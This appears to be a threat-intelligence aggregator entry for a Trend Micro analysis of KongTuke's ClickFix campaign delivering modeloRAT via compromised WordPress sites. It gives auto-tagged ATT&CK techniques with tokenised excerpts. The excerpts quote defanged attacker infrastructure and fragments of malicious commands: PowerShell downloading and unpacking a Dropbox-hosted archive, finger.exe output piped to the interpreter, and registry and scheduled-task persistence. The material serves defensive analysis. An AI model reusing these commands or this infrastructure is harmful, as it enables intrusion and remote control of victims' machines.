TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Trend Micro Research

Through the Lens of MDR: Analysis of KongTuke’s ClickFix Abuse of Compromised WordPress Sites

Lisa Wu · 2026-03-10 · Read original ↗

ATT&CK techniques detected

17 predictions
T1059.001PowerShell
98%
“connected to an external ip ( 45. 61. 138 [. ] 224 ) and piped the response directly into the command interpreter, enabling remote command execution ( rce ). although finger. exe is a legitimate windows networking tool, it was abused in this instance to establish unauthorized rem…”
T1059.006Python
97%
“##ta \ winpython. zip " to retrieve a zip archive from an attacker - controlled dropbox link and saves it to % appdata %. - extract the archive. it uses the command expand - archive - path " $ env : appdata \ winpython. zip " - destinationpath " $ env : appdata " to unpack what a…”
T1053.005Scheduled Task
95%
“for persistence, the following registry entries are created : - objectregistryvalue : monitoringservice - objectregistrykeyhandle : hkcu \ software \ microsoft \ windows \ currentversion \ run - objectregistrydata : c : \ users \ < username > \ appdata \ roaming \ wpy64 - 31401 \…”
T1059.001PowerShell
93%
“##s leads to a fake captcha page instructing the user to run a powershell command. while the powershell observed in our case differed from the april 2025 example, it exactly matched the command documented in a separate january 2026 finding, which described the same infection chai…”
T1059.001PowerShell
90%
“remediation instructions. once they follow the instructions, they ’ ll inadvertently execute a malicious powershell command. in our mdr investigation, however, we found no evidence of the crashfix browser - extension method. instead, trendai vision one™ forensics indicates that t…”
T1027Obfuscated Files or Information
75%
“< username > \ appdata \ local \ microsoft \ windows \ softwareprotectionplatform \ udp. pyw " " / sc minute / mo 5 / f our analysis udp. pyw file shows that this threat employs a multilayered obfuscation to prevent string analysis or manual investigation of the script. after dec…”
T1059.001PowerShell
68%
“modes. py module initiates reconnaissance activity that profiles the compromised host before advancing to subsequent stages of intrusion. telemetry analysis shows the malware invoking powershell in hidden, non - interactive mode, executing a rapid sequence of enumeration commands…”
T1059.001PowerShell
67%
“extension to initiate infection. - the attack relies heavily on legitimate system tools and trusted services to avoid detection. by abusing components such as powershell, finger. exe, dropbox - hosted files, and portable python environments, the malware can execute commands remot…”
T1204.004Malicious Copy and Paste
63%
“##s leads to a fake captcha page instructing the user to run a powershell command. while the powershell observed in our case differed from the april 2025 example, it exactly matched the command documented in a separate january 2026 finding, which described the same infection chai…”
T1105Ingress Tool Transfer
61%
“using : get - ciminstance - namespace root / securitycenter2 - classname antivirusproduct - this collects installed antivirus product names. - it sends the collected data via http post to : hxxp : / / 45. 61. 138 [. ] 224 / n. - the message body includes : - a campaign identifier…”
T1059.001PowerShell
59%
“through the lens of mdr : analysis of kongtuke ’ s clickfix abuse of compromised wordpress sites malware through the lens of mdr : analysis of kongtuke ’ s clickfix abuse of compromised wordpress sites our analysis of an active kongtuke campaign deploying modelorat — malware capa…”
T1059.001PowerShell
57%
“: hxxps : / / foodgefy [. ] com / 6o0jk. js ( 162. 33. 178 [. ] 171 — as399629 [ bl networks ] ). the injected script aligns with the documented kongtuke tradecraft, which does the following : - set a cookie. - make a request to a cloudflare endpoint to get trace information ( su…”
T1059.001PowerShell
55%
“##ress highlighted the emergence of the new crashfix technique, our mdr findings confirm that the group still uses compromised wordpress websites and fake captcha lures as infection vector. both delivery paths — crashfix browser - extension abuse and clickfix / fake captcha chain…”
T1204.002Malicious File
46%
“extension to initiate infection. - the attack relies heavily on legitimate system tools and trusted services to avoid detection. by abusing components such as powershell, finger. exe, dropbox - hosted files, and portable python environments, the malware can execute commands remot…”
T1059Command and Scripting Interpreter
38%
“connected to an external ip ( 45. 61. 138 [. ] 224 ) and piped the response directly into the command interpreter, enabling remote command execution ( rce ). although finger. exe is a legitimate windows networking tool, it was abused in this instance to establish unauthorized rem…”
T1204.002Malicious File
36%
“##4c78f2621 ', ' b64decode ', ' var _ 1363a4c4e644abdf ', ' bytes ', ' enumerate ', ' len ', ' var _ 40eab56476d5b9f6 ', ' decode ', ' var _ ae751dbc35895e07 ', ' var _ 794ede7b4b034ebe ', ' xor _ encrypt _ decrypt ', ' get _ codepage ', ' run _ command ', ' get _ domain ', ' con…”
T1204.004Malicious Copy and Paste
32%
“extension to initiate infection. - the attack relies heavily on legitimate system tools and trusted services to avoid detection. by abusing components such as powershell, finger. exe, dropbox - hosted files, and portable python environments, the malware can execute commands remot…”

Summary

Our analysis of an active KongTuke campaign deploying modeloRAT — malware capable of reconnaissance, command execution, and persistent access — through compromised WordPress sites and fake CAPTCHA lures shows that the group still operates this delivery chain in parallel with the newer CrashFix technique.